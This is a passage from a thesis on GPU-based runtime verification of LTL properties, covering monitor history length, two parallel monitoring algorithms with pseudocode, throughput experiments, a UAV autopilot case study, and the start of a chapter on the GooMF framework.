logical step in evaluation of φ. Thus, the structure of Mφcharacterizes the temporal
complexity of φ. Running a finite program trace on Mφresults in obtaining a sequence
of states ofMφ. This sequence encodes a history (denoted Hφ) of state changes in the
program under inspection and consequently in the monitor. In the context of monitoring,
we are only concerned with the longest minimal good or bad prefixes in L(φ). Thus, the
length of the history for the property φ(denote∥Hφ∥) is the number of steps that the
monitor needs at most to evaluate φ. For example, for the trivial property φ≡⊤, we
have∥Hφ∥= 0, sinceφis evaluated in 0 steps (see Figure 3.2a). Figure 3.2b, shows three
properties and their corresponding monitors, where ∥Hφ∥= 1. Figure 3.3a demonstrates
the monitor of property φ1≡p∧(qUr), where∥Hφ1∥= 2. This is because the length of
the longest path from the initial state q0to a conclusive state is 2 and the monitor has no
cycles. transition if, for example, p∧ris observed in the first letter of the input word.
Definition 9 (History) Letφbe a property in Ltlmon
3andw∈Σωbe an infinite word.
The history ofφwith respect to wis the sequence of states Hφ
w=q0q1...ofMφ=
(Σ,Q,q 0,δ,λ), such that qi∈Qandqi+1=δ(qi,wi), for alli≥0.
21
q1
truer
truep∧q∧ ¬r
¬q∧ ¬r
q∧ ¬rq⊥ q⊤¬p∨(¬q∧ ¬r) p∧rq0(a)∥Hφ1∥= 2
q∧ ¬r
truerq0 q1
q⊥p∧ ¬q∧ ¬r ¬q∧ ¬rp∧q∧ ¬r¬p∨r (b)∥Hφ2∥=∞
Figure 3.3: Monitors for properties φ1≡p∧(qUr) andφ2≡□(p⇒(qUr)).
Definition 10 (History Length) Letφbe a property in Ltlmon
3 andw∈Σωbe an
infinite word. The history length ofφwith respect to w(denoted∥Hφ
w∥) is the number of
state transitions in history Hφ
w=q0q1q2..., such that qi̸=qi+1, for alli≥0. The history
length of a property is then:
∥Hφ∥= max{∥Hφ
w∥|w∈Σω∧whas a minimal good /bad prefix}
We also say that the good/bad minimal prefix of input word w′∈Σωthat leads to the
maximum length history is an identifying minimal prefix .
We clarify a special case, where a monitor contains a cycle reachable from its initial
state and a conclusive state is reachable from the cycle. In this case, according to Definition
10, history length of the associated property is infinity. For example, Figure 3.3b illustrates
such a monitor. Obtaining length of infinity is due to the existence of cycle q0−q1−q0.
In other words, the monitor may encounter infinite number of state changes when running
an infinite word before reaching a conclusive state.
Theorem 1 Letφbe a property in Ltlmon
3.Mφis cyclic iff∥Hφ∥=∞.
Proof 1 We distinguish two cases:
•(⇒)If a cycle exists in Mφ, then it does not involve conclusive state. This is be-
cause any conclusive state is a trap. Thus, given a cycle  ̄q=q0−q1−q2...q k−q0
of inconclusive states, one can obtain an infinite word w∈Σω, such that the corre-
sponding history Hφ
wwill run infinitely on  ̄qand has infinite number of state changes.
Therefore,∥Hφ
w∥=∥Hφ∥=∞.
22
•(⇐)The opposite direction also holds. If the length of a property history is ∞, then
it has to be the case that some states in the history are revisited. This implication is
trivial, because the number of states of a monitor is finite. Hence, the monitor must
contain a cycle.
In general, the structure of a monitor depends on the structure of its Ltl 3formula (i.e.,
the number of temporal and Boolean operators as well as nesting depth of operators). For
instance, the temporal operator ⃝increments the history length of an Ltl 3formula by 1.
If a formula does not include the Utemporal operator, then the structure of its monitor
will be a linear sequence of states and will not contain any loops. However, the reverse
direction does not hold. For instance, properties φ≡p∨(qUr) andψ≡pU(qUr) have
both history of length 2.
Note that a finite history length for a property φ(i.e.,∥Hφ∥=n, wheren<∞) does
not necessarily imply that any history will have a finite number of states before reaching
a conclusive state. This is because self-loops in Mφmay exist. Finiteness of ∥Hφ∥simply
means that monitoring φtakes at most nstate changes inMφto reach a verdict.
Using these definitions, we introduce a natural hierarchy of Ltlformulas. Given Ltlmon
H=i
a set of monitorable properties with history of length i,
Ltlmon
3=⋃∞
i=0Ltlmon
H=i
It is easy to see that this hierarchy is semantically strict. One can always find φ∈
LtlH=i+1, such thatφ /∈LtlH=i. For instance, property φ=⃝(...(⃝
n+1 operatorsp)...)∈LtlH=n+1,
but/∈LtlH=n.
3.2.2 Partial–Offload Algorithm
As stated previously, the algorithms in this chapter are presented in the order of the GPU
involvement in the verification process. The partial–offload algorithm is very similar
to the sequential algorithm in its logic. The only difference is that some of the predicates
calculations are offloaded to the GPU. It is up to the developer to specify which properties
should be offloaded. For example, if for the set of desirable properties only one of the
properties is computationally intensive, it makes sense to perform the calculation of those
special predicates on the GPU side. Thus, the only part that is effectively parallelized is
the evaluation of predicates. Input and output are the same as in sequential algorithm.
The algorithm flow is as follows:
23
1. New buffer of program states s0,...,s nis received.
2. Based on s0,...,s n, perform calculations to map the predicates (the LTL formula
consists of) to either true orfalse :
(a) Send the program states to the GPU.
(b) The GPU evaluates the offloaded predicates to either true orfalse .
(c) Send the offloaded predicate values back to the CPU.
(d) The CPU evaluates the rest of the predicates.
3. Based on the values of the predicates, make the appropriate transition if needed.
Note that even if the call for the GPU evaluation is synchronous, the CPU can perform
evaluations of the non-offloaded predicates simultaneously, thus cutting the total execution
time of the algorithm. Another possible optimization is to send only the partial program
states to the GPU, as offloaded predicates might use only some of the variables from the
program state. This optimization will reduce the memory transfer time.
3.2.3 Finite-history Algorithm
Finite-history algorithm takes a program trace and processes it in a parallel fashion
by assigning different program states to the different GPU cores. To handle the causal
order between the state transitions, the algorithm starts a new iteration every time a state
transition occurs. Consequently, in each new iteration, a different current monitor state
will be given. Intuitively, the number of iterations required to process the whole program
trace, is bounded by the history length of the monitored property.
We now describe the algorithm in detail. The algorithm takes a finite program trace
σ=s0s1...s n, a monitorMφ= (Σ,Q,q 0,δ,λ), and a current stateqcurrent∈Q(possibly
q0) of the monitor as input and returns a resulting state qresult and the monitoring verdict
λ(qresult) as output (see Algorithm 1). The algorithm works as follows:
1.Initialization: The algorithm initializes tuple Ito⟨n+1,qcurrent⟩(line 2). This tuple
is used to keep the index of the left-most (in trace σ) program state that causes a
state transition in the monitor and the resulting state of this transition. The tuple
may return either the key (program state index) as in line 7 or the value (resulting
monitor state) as in line 15. StartIndex points to the first program state to be
processed in the current iteration (0 in the beginning).
24
2.Parallel computation of next monitor state: In lines 4–11, the algorithm computes
the contents of tuple Iin parallel. Tuple Iis set to⟨i,qresult⟩only if program state
siresults in enabling a transition from current monitor state qcurrent andiis strictly
less than the previous value of key(I). This way, at the end of this phase tuple Iwill
contain the left-most transition occurred in the monitor. Observe that lines 7–9 are
protected as a critical section and, hence, different processing units are synchronized.
This synchronization is implemented at the GPU work–group level within the same
computation unit. Thus, there is no global synchronization and parallelism among
work groups is ensured. Moreover, observe that the most costly task in the algorithm
(i.e., predicate evaluation on Line 5) is not in the critical section and executes in
parallel with other such evaluations.
3.Obtaining the result: The third phase of the algorithm computes the final state of
the monitor. If key of Iis set to the initial value n+ 1, then no transition of the
monitor gets enabled by program trace σ. In this case, the algorithm terminates and
returns (qresult,?) as output (line 13). Otherwise, if a change of state in the monitor
occurs and results in a conclusive state, then the algorithm returns this state and
the monitoring verdict (line 17). Transition to an inconclusive state yields update of
bothqcurrent and StartIndex and a new iteration (lines 19–21).
For illustration, consider property φ1≡p∧(qUr) and its monitor in Figure 3.3a.
Let the current state of the monitor be qcurrent =q0and the input program trace be
σ= (p∧q∧¬r)·(¬p∧q∧¬r)·(p∧q∧¬r)·(p∧¬q∧¬r). By applying this trace, first,
the monitor makes a transition to state q1after meeting p∧q∧¬r. Although the next two
program states (i.e., ( ¬p∧q∧¬r)·(p∧q∧¬r)) of the input trace also cause program state
transitions, the algorithm considers only the left-most transition, thus the first iteration
records transition to q1and the second iteration starts from s1. Finally, during the second
iteration only the last program state p∧¬q∧¬renables the monitor transition from q1to
q⊥.
It is straightforward to observe that algorithm performs 2 iterations, which is precisely
∥Hp∧(qUr)∥. In general, the number of algorithm iterations is equal to the number of state
transitions in the underlying automaton. Thus, the complexity of the algorithm on one
property isO(∥Hφ∥) and onmpropertiesO(max{∥Hφi∥ |1≤i≤m}). So the increase
is less than linear. Following Theorem 1, the monitor constructed from a finite-history
property does not contain a cycle. In other words, the number of state transitions during
monitoring (and, hence, before reaching a conclusive state) is bounded by ∥Hφ∥. Since
there can be a maximum of ∥Hφ∥algorithm iterations, this number may be less if an input
trace imposes a shorter path from qcurrent to a conclusive state of the monitor. Either way,
25
Algorithm 1 For finite-history Ltlmon
3properties
Input: A monitorMφ= (Σ,Q,q 0,δ,λ), a stateqcurrent∈Q, and a finite program trace σ=s0s1s2...sn.
Output: A stateqresult∈Qandλ(qresult).
/*Initialization */
1:StartIndex←0
2:I←⟨n+ 1,qcurrent⟩
3: Let mbe a mutex
/*Parallel computation of next monitor state given the current state */
4:for all (si,StartIndex≤i≤n) in parallel do
5:qresult←δ(qcurrent,si)
6: lock( m)
7:if(qcurrent̸=qresult∧i<key (I))then
8:I←⟨i,qresult⟩
9:end if
10: unlock( m)
11:end for
/*Obtaining the result */
12:ifkey(I) =n+ 1then
13: returnqresult,?
14:else
15:qresult←value (I)
16: ifλ(qresult)̸= ?then
17: returnqresult,λ(qresult)
18: end if
19:qcurrent←qresult
20: StartIndex←StartIndex +key(I) + 1
21: goto line 2
22:end if
the overhead of interrupting the iteration in the middle is bounded by a constant. This
overhead becomes negligible as input size and monitoring time increase.
In case of the infinite history length, there are two conditions that combined together
may cause excessive iterations and lead to the performance degradation of the algorithm:
(1) existence of a loop in Mφ, and (2) sequence of the program states that results in
constant loop traversing. The Algorithm presented in Subsection 3.2.4 addresses these two
conditions.
More precise, the execution time of the algorithm on one chunk of data now can be
described by the following formula:
26
T1=tmt1+E(n).max{m∑
j=1(ti
calc+ti,j
branch )|1≤i≤n} (3.3)
wheretmt1is the memory transfer time to the processing unit, which, if a parallel evaluation
takes place on a CPU or the buffer resides in the shared memory, is negligible (consider
AMD Fusion architecture as mentioned in Section 1). E(n) is the expected number of
the monitor state transitions (and algorithm iterations consequently) per ndata items. It
encodes conditions (1) and (2) from the previous paragraph.
3.2.4 Infinite-history Algorithm
The second algorithm is an adaption of the algorithm in [24] for parallel execution of de-
terministic finite state machines. This algorithm does not tackle the issues with causal
order of state changes directly. Instead, it calculates possible state transitions for every
monitor state (except the conclusive states, since they are traps), regardless of the actual
current state of the monitor. Then, in a sequential phase the algorithm aggregates all the
results to compute one and only one current state. This sequential run reflects the transi-
tions in the underlying monitor that are identical to those caused by sequential processing.
Consequently, this algorithm does not depend on the history length of a property.
Now, we describe the algorithm in more detail. Similar to Algorithm 1, it takes a
finite program trace σ=s0s1...s n, a monitorMφ= (Σ,Q,q 0,δ,λ), and a current state
qcurrent∈Q(possiblyq0) of the monitor as input and returns a resulting state qresult
and the monitoring verdict λ(qresult) as output. For parallelization, we leverage a well-
known exhaustive execution method, where we eliminate the input interdependencies by
considering all possible outputs. The algorithm works as follows:
1.Initialization: First, the algorithm computes all inconclusive states of the monitor.
We do not consider conclusive states, since they always act as a trap. In order
to eliminate input interdependencies, we maintain a lookup matrix Afor storing
intermediate results, for each state of the monitor and a program state from trace σ
(see Figure 3.4).
2.Parallel exhaustive state computation: In lines 3–7, the algorithm computes the
columns of matrix Ain parallel. Each element of Ais calculated using a monitor
state and a program state. A program state identifies the set of atomic propositions
and, hence, the letter in Σ that holds in that state. Although calculation of step i+1
27
Algorithm 2 For infinite-history Ltlmon
3properties
Input: A monitorMφ= (Σ,Q,q 0,δ,λ), a stateqcurrent∈Q, and a finite program trace σ=s0s1s2...sn.
Output: A stateqresult∈Qandλ(qresult).
/*Initialization */
1:Q?={q∈Q|λ(q) =?}
2: LetAbe a|Q?|×nmatrix
/*Parallel exhaustive computation of monitor states */
3:for all (si,0≤i≤n) in parallel do
4:for allqj∈Q?do
5:Aqj,si←δ(qj,si)
6:end for
7:end for
/*Sequential computation of actual monitor state */
8:qresult←qcurrent
9:for all (0≤i≤n) sequentially do
10:qresult =Aqresult,si
11: ifλ(qresult)̸= ?then
12: returnqresult,λ(qresult)
13: end if
14:end for
15:returnqresult,?
depends on the output of step i, by calculating and storing qi+1for all possible qi,
this interdependency can be eliminated (i.e., for every siandqj, we calculate element
Aqj,si=δ(si,qj)). For example, for property φ≡□(p⇒(qUr)) from Figure 3.3b,
the matrix is of size 2 ×nbecause of two inconclusive states in Mφ:q0andq1. Note
that this part of the algorithm can be done independently for each si— in parallel
in other words.
3.Actual state computation: The third phase of the algorithm consists of a sequential
pass of length at most nover the columns of matrix A. Initially, the resulting state
isqcurrent . The output of step iis the content of Aqresult,si. Note that in this step,
the value of qresult changes only if a transition to a different state of the monitor is
enabled. This way, the algorithm starts from state qcurrent and terminates in at most
nsteps. The value of qresult reflects every change of the state of the monitor when the
algorithm executes lines 8–14. In Figure 3.4, for example, this step-by-step sequential
evaluation jumps from qcurrent =q0toqresult =q|Q?|after the second step and finally
28
...
...
...
...q0
q0q0q0
q2q1q0
q1
q0q0q2
q2q1q0
q2q0q0
q1q1q0
q0q1q0
q0q1q0s0 s1 s2 s3 sn−3sn−2sn−1Figure 3.4: Eliminating interdependencies for parallel execution
concludes in qresult =q1. At any point, if qresult happens to be a conclusive state, then
the algorithm terminates and returns the verification verdict of the monitor (lines
11–13).
Finally, if the monitor does not reach a conclusive state, then the algorithm returns the
reached state by trace σand value ?.
Unlike the first algorithm, the performance of this algorithm does not depend on the
structure of the monitor, as all possible state transitions are absorbed by the final sequential
pass. On the other hand, the extra calculations undertaken for every inconclusive state,
as well as memory transfer of the results of those calculations back to the host process
on the CPU, add to the execution time. The complexity of the algorithm now depends
on the size of the input and the number of inconclusive states in the underlying monitor:
O(n.∑m
i=1|Q?|i). More precise, the total execution time can be described by the following
equation:
T1=tmt1+tmt2+tseq+ max{m∑
j=1(ti,j
calc+|Q?|j∑
k=1ti,j,k
branch )|1≤i≤n} (3.4)
wheretseqis the time spent on the sequential phase (lines 8 to 14), and tmt1andtmt2
are memory transfer times to and from processing unit respectively. Again, if a parallel
evaluation takes place on a CPU or the buffer resides in the shared memory, then tmt1and
tmt2are negligible.
29
Program
Host GPUMonitor
DATA
FeedbackProgram traceFigure 3.5: GPU-based architecture for experiments
3.3 Evaluation of Algorithms
3.3.1 Experiment Setup
Figure 3.5 shows the architecture of the experiment setup. Following is the detailed de-
scription of the main components:
•Program instrumentation: We instrument the original program under inspection, so
that it stores the program states in a buffer as a program trace. From time to time
(depending upon the design parameters), the program writes this trace to the shared
memory.
•Host process: The host process is a C program that reads program traces from the
shared memory, redirects them to the monitoring processing unit, and manages the
verification results. The only overhead incurred by the host is for memory transfers.
In fact, the host is blocked while waiting for the verification tasks to complete. Obvi-
ously, this is not the case in traditional sequential monitoring (i.e., the CPU carries
all the computations, which increases potential interference with the program under
scrutiny).
•Monitor generation: Generating code for a monitor is done in two steps:
30
1. Given an Ltl 3property, we generate a monitor as a deterministic finite state
machine as defined in Definition 6 using the tool from [6].
2. Next, we automatically generate two modules of code to implement the mon-
itor constructed in the previous step. The first module is a single-threaded C
program that instantiates a simple sequential monitor. The second module is
a concurrent program that implements either Algorithm 1 or 2 to parallelize
execution of the monitor. The code of this module is generated in the OpenCL
language for GPU programming. The generation tool called GooMFGenerator
and is described in detail in Section 4.2.
When using the sequential algorithm, the need in memory transfer and the host pro-
cess itself is eliminated. Instead, the inspected program directly calls for the verification
functions. Also, the finite state machines are implemented in the simplest way. All this
to ensure maximal efficiency of the sequential monitoring, which, in turn, will provide ad-
ditional validity to the comparison between parallel and sequential monitoring carried out
in the following sections.
All the experiments are conducted on 32-bit Ubuntu Linux 11.10 using a 8x3.07GHz
Intel Core i7 and 6GB main memory and an AMD Radeon HD5870 graphics card as GPU.
At the time the experiments were conducted the partial–offload algorithm was not yet
conceived, thus only three algorithms are inspected. Section 5.4 delivers the results on the
partial–offload algorithm instead.
3.3.2 Throughput Analysis
In the context of monitoring, throughput is the amount of data monitored per second. In
the following experiments, the program trace is fed to the monitor directly from the main
memory, thus maximizing throughput of the algorithms.
Effect of the Computational Load
From now on, we refer to computational load as the number of evaluations of all mathe-
matical and arithmetic operations in order to evaluate atomic propositions of a property.
Computational load is a necessary step before verification of a property and has direct
effect on the sequential monitoring time, as it is performed by the CPU. However, in our
GPU-based approach, the computational load is spread over GPU cores. We hypothesize
that our approach will outperform a sequential monitoring technique.
31
0.1 0.2 0.3●
●
●
●●●
●
●
●●●
●Algorithm 1
Algorithm 2
Sequential algorithm
0 20 40 60 80 100
Number of sin() operationsMean throughput [GB/s](a) Effect of computational load
1 2 3 4
φ1 / 1 φ2 / 3 φ3 / 10
Property / Inconclusive statesMean throughput ratioLine code
Evaluated properties = 1
Evaluated properties = 10 (b) Comparison of the algorithms
Figure 3.6: Evaluation results
In order to validate our hypothesis, we emulate different computational load on property
φ=□(¬a∨¬b∨¬c∨¬d∨¬e), where∥Hφ∥= 1. The number and the type of the properties
are not essential, as the goal is to isolate the load factor. The loads are 1x, 5x, 20x, and
100x, where ‘x’ is one sin() operation on a floating point operand. We run the experiment
for the parallel algorithms on 1600 cores available on the GPU and measure the throughput
of three algorithms (i.e., a sequential algorithm as well as Algorithms 1 and 2 from this
paper). Figure 3.6a shows the results of this experiment (the error bars represent the 95%
statistical confidence interval).
As can be seen in Figure 3.6a, both Algorithms 1 and 2 outperform a sequential al-
gorithm as the computational load increases. For instance, for 100 sin() operations Algo-
rithms 1 outperforms the sequential algorithm by a factor of 35. Thus, as Equations 3.3
and 3.4 in Subsection 3.2.3 and 3.2.4 suggest, there is a loose dependency between our
parallel algorithms’ throughput and the computational load. This observation along with
the graph in Figure 3.6a conjectures that the computational load is not a bottleneck for
our algorithms. On the contrary, the sequential algorithm performance is poorer than the
linear dependency on the computational load as Equation 3.2 in Section 3.1.
Under the conditions of this experiment, the superiority of the GPU-based monitoring
will only grow in the future: while the desktop configuration is one of the most powerful
available, the GPU series used in the experiments is more than two years old. Newer
GPU series will offer an increase in both the number of processing units and memory
transfer throughput. The performance of the sequential algorithm, on the other hand, is
32
constrained by the staggering growth in the processing speed of the single core.
Performance Analysis of Algorithms 1 and 2
We hypothesize that Algorithm 1 would outperform Algorithm 2, as Algorithm 2 evaluates
the next state of allinconclusive states in the monitor. In addition, Algorithm 1 does not
transfer the calculated states back to the CPU (recall that lines 8–14 of Algorithm 2 run
on the CPU). The only slowdown factor that appears in Equation 3.3 and does not appear
in Equation 3.4, is E(n). Given the finite number of monitor state transitions, this factor
becomes negligible as the monitoring time increases.
The experimental setting consists of the following input factors: algorithm type, number
of properties for monitoring, and the number of inconclusive states in the monitor of a
property. This is due to the fact that the number of inconclusive states affects the amount of
calculations the second algorithm should carry (see Equation 3.4). The size of the program
trace is 16,384 states. We consider three different properties. Two of the properties are
taken from the set of properties in [18] for specification patterns: φ1≡□¬(a∨b∨c∨d∨e)
andφ2≡□((a∧♦b)⇒((¬c)Ub)), where the number of inconclusive state are 1 and 3,
respectively. The monitors of properties in [18] are relatively small (the largest monitor has
five states). Thus, our third property is the following (rather unrealistic) formula whose
monitor has 10 inconclusive states:
φ3≡ ⃝⃝...⃝
10 next operators(aUb)
Figure 3.6b confirms the hypothesis. We emphasize that the graphs in the figure rep-
resent the ratio of the throughputs of Algorithm 1 over Algorithm 2. X-axis represents
the number of inconclusive states in the monitored property (1 for φ1, 3 forφ2, and 10
forφ3). The solid line shows the experiments for one property and the dashed line plots
the experiments for a conjunction of ten identical properties. Algorithm 1 consistently
performs better on all of the properties. The ratio only grows when the the number of
inconclusive states in the property increases.
Scalability
As illustrated in Figure 3.5, the host submits chunks of the program trace to the monitoring
tasks running on the GPU. A chunk is the array containing a sub-trace to the GPU internal
33
0.1 0.2 0.3
●●●●●●●●●●●●●●
●●●●
●●●●
●●●
●
●●●
●
●●●
●
●
●●
●
●
●●
●
●
●●
●
●
●Alg 1, 10 propertiesAlg 1, 1 property
Alg 2, 10 propertiesAlg 2, 1 property
0 5000 10000 15000
Number of work itemsMean throughput [GB/s]Figure 3.7: Throughput vs number of work items
buffers. Once the GPU is available, it will pull the next task from the queue and will run
the task on the input data following the Single Instruction Multiple Data (SIMD) pattern.
The GPU also implements the internal scheduling mechanism that controls the process
of assigning the data to the GPU cores. However, input array can be represented as a
number of work items . Thus, by setting this number to one, we ensure that only one core
participates in the evaluation. Consequently, by increasing the number of work items to the
number of items in the input data, we control the number of cores engaged in monitoring.
If the chunk size is greater than the number of cores, then at some point the GPU scheduler
will have to assign several work items to the same core.
In this experiment, we fix all contributing factors as constants (including the chunk
size of 16,384) and only change the monitoring algorithm, the number of work items, and
the number of properties for monitoring. The results (shown in Figure 3.7) imply that the
algorithms are clearly scalable with respect to the number of cores. The error bars represent
the 95% confidence interval. The result shows that the mean throughput increases with
the number of cores engaged in monitoring. At some point, both algorithms reach the
optimum, where all the core are utilized. From that point and on, the throughput will be
mostly affected by the GPU thread scheduler.
34
0.0 0.1 0.2 0.3 0.4
0 5000 10000 15000
Chunk size [No. of  program states]Mean throughput [GB/s]Line code
GPU, Algorithm 2
GPU, Algorithm 1
CPU, Sequential algorithmFigure 3.8: Effect of the buffer and data sizes
Effect of Data and Chunk Sizes on Throughput
The factors of this experiment comprise the algorithm type, the number of simultaneously
evaluated properties, and the amount of data in each run (see Figure 3.8). The error bars
indicate the 95% confidence interval. The line type indicates the type of algorithm. The
five lines for each algorithm show results for different amounts of data (i.e., 10, 20, 30, 40,
and 50 data chunks). The results show that sequential monitoring is neither influenced by
the chunk size nor the amount of data. The mean throughput of the parallel monitoring
shows a strong correlation with the chunk size. This is expected, since an increase of the
chunk size results in a higher number of the program states processed in parallel. This, in
turn, leads to the more efficient distribution of the work items among the cores. However,
this throughput gain is limited by the amount of memory available on the GPU and the
tolerable delay of the program. The minor differences between the results with different
amounts of data show the independence of the mean throughput from the amount of data.
This is expected behavior and increases our confidence in the results.
3.3.3 UAV Case Study
This section offers additional benefits of using the GPU-based monitoring. When engaging
the parallel algorithms instead of sequential for the UAV flight monitoring, the numbers
35
LIDAR, 1.6 GHz DVS LIDAR, 800 MHz
405060708090100
●●
●●
●●
●●●●
●●
●●
●
●
●●●●
●
●●●
●●●●
●
●●●
●
●●●●●●
●●●●
●●●
●
●●●
●●
●
●
●●
●
●●●●●
●
●●
●●●●
●●
●●
●
●●
●●●●
●
●
●●
●●●●●
●●
●●●●
●
●●
●●
●●●
●●
●
●●●●●●●●
●●
●●
●●
●●●●●●●●●●●●●
BaseCPUGPU (Alg 1)GPU (Alg 2)BaseGPU (Alg 1)GPU (Alg 2)System utilization [%](a) CPU utilizationType Name Avg Watt
1 Nothing Idle 15.56
2 No LIDAR CPU 20.20
3 GPU (Alg 1) 15.82
4 GPU (Alg 2) 15.72
5 LIDAR, 1.6 GHz DVS Base 27.81
6 CPU 28.80
7 GPU (Alg 1) 28.73
8 GPU (Alg 2) 28.04
9 LIDAR, 800MHz Base 22.29
10 GPU (Alg 1) 23.00
11 GPU (Alg 2) 22.42
(b) Power consumption
Figure 3.9: Case study experiments
showed 25% of reduction in power consumption as well as significant decrease in CPU
utilization during the flight.
The monitor checks at run time an unmanned aerial vehicle (UAV) autopilot software
running on Beagle Board with QNX 6.5 OS. The monitor runs on an ASUS E35-M1 board
containing dual-core AMD E350 APU and Ubuntu 11.10 OS. Another process running
alongside with monitor is LIDAR — a grid reconstruction algorithm — that emulates the
load of the autopilot. The scale of the software being examined:
•Size of Monitor: 52K
•Size of Autopilot: 78K
•Lines of code in Monitor: 3000
•Lines of code in Autopilot: 4000
Every 10ms, the autopilot sends the program state consisting 14 float numbers to the
monitor over the crossover Ethernet cable using the UDP protocol. The host thread in the
36
monitor interpolates the data and fills up the buffer. The GPU then processes the buffer
using one of the three evaluation algorithms. We verify the following five properties:
1.φ1≡□(a∧b∧c)
This property verifies the sanity of the IMU sensors during the flight. IMU (Inertial
Measurement Unit) measures values of pitch, yaw, roll and their velocities. The prop-
erty compares the numerical values of the angular acceleration from the sensors with
calculated analytical values from the two consecutive program states. Predicates a,
bandcstand for the calculations on the three dimensions.
2.φ2≡□(d⇒(⃝¬d)∨(⃝⃝¬d)∨(⃝⃝⃝¬d))
Predicatedstands for “number of satellites less than three”. The property verifies
that this undesirable state will not last in more than four consecutive program states.
3.φ3≡□(e)
This property verifies whether the autopilot translates the coordinates of latitude,
longitude, and altitude correctly. Predicate estands for the transformation function.
4.φ4≡□(f⇒♦g)
This property verifies that the UAV eventually lands. Predicate fstands for “alti-
tude higher than 500”, predicate gstands for “altitude less than 358” — the altitude
above the sea level on the university campus.
5.φ5≡□(h∧i∧j∧k∧l)
This property verifies the requirements of Transport Canada Agency stated in Safety
Flight Operation Certificate Requirements document: the flight is permitted only
within specific coordinates on the campus of the University of Waterloo.
If one of the properties is violated/satisfied, the monitor will send a UDP packet indi-
cating the property that has converged, back to the autopilot.
The experiment consists of two parts: first part reports the CPU utilization measure-
ments (Figure 3.9a) and the second part reports the power consumption during the flight
(Table 3.9b). As the monitoring takes place during the flight, we do not measure execution
time. Rather, we measure CPU utilization. As Figure 3.9a shows, LIDAR alone consumes
37
about 57% of CPU time when running the system with default “ondemand” policy. When
this CPU scheduling policy is on, the OS switches the CPU to highest frequency upon
demand and back to the lowest frequency after the task is done. While switching the
frequencies, Dynamic Voltage Scaling (DVS) takes place. This explains the outliers in the
GPU-based evaluation algorithms, which otherwise barely increase the regular consump-
tion. On the contrary, running the CPU-based monitoring, results in utilizing practically
all the CPU resources. In safety critical systems with real-time constraints, this can lead
to the missing cycles, which is obviously problematic. When GPU-based monitoring is on,
the amount of idle CPU time indicates that the frequency can be lowered without risk of
missing cycles. Second part of the graph shows the system running on the “userspace”
scheduling policy with constant frequency of 800 MHz. The utilization rises to 81%, but
never reaches 100%.
Table 3.9b reports the average of the power consumption measurements over the time
and closely correlates with the Figure 3.9a. E350 APU board is given constant power supply
of 15 Volts and by recording the current level we calculate the consumed power. Rows 2–4
report the consumption of the system without background load of LIDAR, while rows 5–8
show close consumption levels with LIDAR running. Although without background load
the GPU-base monitoring consumes 25% less power than CPU-based, this approach is not
practical, as we aim at running the monitor and the inspected program on the same board.
To deal with this issue, we set the constant CPU frequency to 800 MHz (rows 9–11 in the
table correspond to the second part of the Figure 3.9a). In addition to solid 25% reduction
in power consumption, this gives us predictable CPU utilization with minimum outliers.
38
Chapter 4
GooMF Framework
This chapter is dedicated to GPU-based online and offline Monitoring Framework ( GooMF )
— a verification framework that enables any C developer to monitor and verify her pro-
gram given a set of desirable properties. The ultimate goal of GooMF is to supply the
developers with an easy-to-use and flexible tool that requires minimal knowledge of formal
languages and techniques. The core of GooMF is the hierarchy of algorithms presented
in Chapter 3. Therefore, the monitoring action can be performed on GPU or on CPU
almost seamlessly for the user. With GPU support enabled, the inspected system benefits
from the range of advantages discussed in the previous chapter, and in particular, mini-
mization of the interference between the monitor and the program, faster processing for
non-trivial computations, and even significant reduction in power consumption comparing
to the CPU-based monitoring.
4.1 Run-Time Verification Tools Overview
We already discussed the shortage of verification tools for C and C++ languages in Sec-
tion 1.2. As the area of run-time verification already offers a selection of frameworks and
tools, in this section, we are trying to identify the characteristics of successful tools. The
majority of the tools in the area can be easily sorted by the language of the target program:
JavaMOP, JavaMaC, J-Lo, Eagle, Hawk, RuleR, Tracematches are for Java; Spec# [2] is
for C#; P2V [31] and Temporal Rover [17] are for C and C++. P2V, although intended for
C programs, is essentially a translation tool for the PSL assertions and requires dedicated
hardware (eMIPS and FPGA) to run on.
39
One interesting exception of this division is the commercial tool Temporal Rover, which,
according to authors, is capable of interfacing with C, C++, Java, Verilog, and VHDL alto-
gether. Temporal Rover is a run-time verification tool based on future time metric temporal
logic. It allows programmers to insert formal specifications in programs via annotations,
from which monitors are generated. The obvious drawbacks are manual instrumentation
of the source code, commercial nature of the framework, and the overhead, which remains
unexplored.
The majority of these tools implementation is tightly coupled with specification for-
malism, but few are able to incorporate plug-ins for different formalisms . The most
prominent example is JavaMOP, which offers seven formalisms for properties specifica-
tions: Ltl, Past-Time Ltl (PTLTL), Finite State Machine (FSM), Extended Regular
Expressions (ERE), Context Free Grammars (CFG), String Rewriting Systems (SRS), and
Past-Time LTL with Calls and Returns (PTCaReT). More important, this impressive set
of specification languages contains the most common Ltlformalism. This feature is par-
ticularly valuable, because Ltlis a de-facto standard in model checking. Thus, combining
offline and online verification is made easy by not requiring modifications to the set of
properties.
Parameterized monitoring is a salient feature that enables users of tools to specify
a reacher set of properties than that available for non-parameterized systems. The classical
example is a property that checks whether open file is eventually closed. Specifying this
requirement with non-parametric properties is tricky, as the file descriptor may be known
only at run time. Verification tool that implements parameterized monitoring, on the other
hand, will spawn new monitoring instance every time new file is opened. Thus, in addition
to adding the expressibility to the properties, parameterized monitoring also contributes
to the clarity and simplicity of the specification. Consider, for example, a program that
potentially operates with thousands of files. Even if all the file descriptors are known
beforehand, specifying property per file would be frustrating. Obviously, parametrized
monitoring is a must-have attribute in monitoring frameworks. We discuss parameterized
monitoring and how it is implemented in GooMF in Chapter 5 in detail.
Both JavaMOP and J-Lo implement parameterized monitoring, but it comes at a price
ofspace and time efficiency , as well as overhead . In monitoring real systems, problem
size can scale extremely fast both in terms of a number of monitoring instances and a num-
ber of monitored events in the system. Space and time efficiency and especially reasonable
overhead are crucial for real-time and safety-critical systems, as unpredictable overhead
can easily be a cause for missing real-time cycles. This is obviously an impediment for the
process of incorporating run-time verification tools into real-time systems. Unfortunately,
these aspects of monitoring usually do not draw attention of the tool developers. This is
40
partly due to the tradeoff between expressibility of the tool and its efficiency.
4.2 GooMF Architecture and Implementation
GooMF is a verification framework that enables C developers to monitor and verify their
program given a set of desirable properties. The monitoring action can be performed
on GPU and / or CPU. The ultimate goal of GooMF is to supply the developers with
an easy-to-use and flexible tool that requires minimal knowledge of formal languages and
techniques. In addition, by incorporating the parallel algorithms into the tool, we achieved
all the advantages of GPU-based verification discussed in the previous section.
GooMF borrows some of the functionality from the setup described in Subsection 3.3.1.
The detailed work–flow is shown in Figure 4.1: the user specifies the properties in a special
